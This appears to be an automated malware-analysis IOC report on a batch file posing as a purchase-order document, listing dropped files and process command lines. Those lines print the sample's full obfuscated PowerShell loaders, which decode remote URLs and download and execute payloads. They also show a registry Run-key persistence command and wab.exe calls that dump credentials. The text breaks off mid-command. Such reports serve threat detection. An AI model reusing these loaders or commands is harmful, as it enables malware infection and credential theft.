IOC Report
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

loading gif

Files

File Path
Type
Category
Malicious
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
ASCII text, with very long lines (4349), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Andragendet8.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\sfvnspt.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22ppql3u.lyk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sfmnaes.4ez.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htykarzd.z00.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgf52erv.xzo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4uslc30.jt3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb520ipz.cem.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wactrupg.vkn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv310C.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\g7Q9039
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Belinda103.Eft
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARZTWOM2N06S30R4R4G5.temp
data
dropped
C:\Users\user\AppData\Roaming\Negligent.Gas
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi: CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ') ;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes ' U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle ,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd( B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres ' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse (Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt 